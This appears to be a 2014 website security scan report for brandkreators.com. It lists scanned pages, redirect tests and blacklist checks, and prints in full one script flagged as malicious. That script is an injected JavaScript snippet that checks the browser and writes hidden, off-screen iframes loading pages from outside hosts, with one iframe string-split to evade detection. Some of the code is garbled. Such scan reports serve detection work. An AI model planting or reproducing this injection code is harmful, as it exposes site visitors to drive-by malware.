Scanned pages/files
Request | Server response | Status |
http://brandkreators.com/ | 200 OK Content-Length: 6548 Content-Type: text/html | clean |
http://brandkreators.com/images/script.js | 200 OK Content-Length: 2627 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
function Grandarium() {
    var soset = navigator.userAgent;
    var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1);
    if (!unicode) {
        document.write('<iframe src="http://duislow.elmillero.us/irifagruse15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>');
    }
}
Grandarium();
(functi var cookie = getCookie('kegaoeutg18sf'+'fekfsj3asjf');
if (cookie == undefined) {
    setCookie('kegaoeutg18sf'+'fekfsj3asjf', true, 172804);
    document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://magazine.northerncoloradocreditrepair.com/jytdhsgseewgh19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1284'+'px'+';'+'top'+':'+'-'+'1284'+'px'+';'+'" height="134" width="134"><'+'/'+'if'+'ram'+'e'+'>');
}
};
})();
Antivirus reports:
http://brandkreators.com/index.html | 200 OK Content-Length: 6548 Content-Type: text/html | clean |
http://brandkreators.com/about.html | 200 OK Content-Length: 4501 Content-Type: text/html | clean |
http://brandkreators.com/services.html | 200 OK Content-Length: 11010 Content-Type: text/html | clean |
http://brandkreators.com/contact.php | 200 OK Content-Length: 6536 Content-Type: text/html | clean |
http://brandkreators.com/test404page.js | 404 Not Found Content-Length: 398 Content-Type: text/html | clean |
http://brandkreators.com/bulk_sms.html | 200 OK Content-Length: 11089 Content-Type: text/html | clean |
http://brandkreators.com/brand_promotion.html | 200 OK Content-Length: 13412 Content-Type: text/html | clean |
http://brandkreators.com/BrandKreators.msi | 200 OK Content-Length: 300951 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: brandkreators.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Aug 2014 15:17:20 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 6548
Content-Type: text/html
Last-Modified: Fri, 13 Jan 2012 03:52:33 GMT
...6548 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: brandkreators.com
Referer: http://www.google.com/search?q=brandkreators.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=brandkreators.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://brandkreators.com/
Result: brandkreators.com is not infected or malware details are not published yet.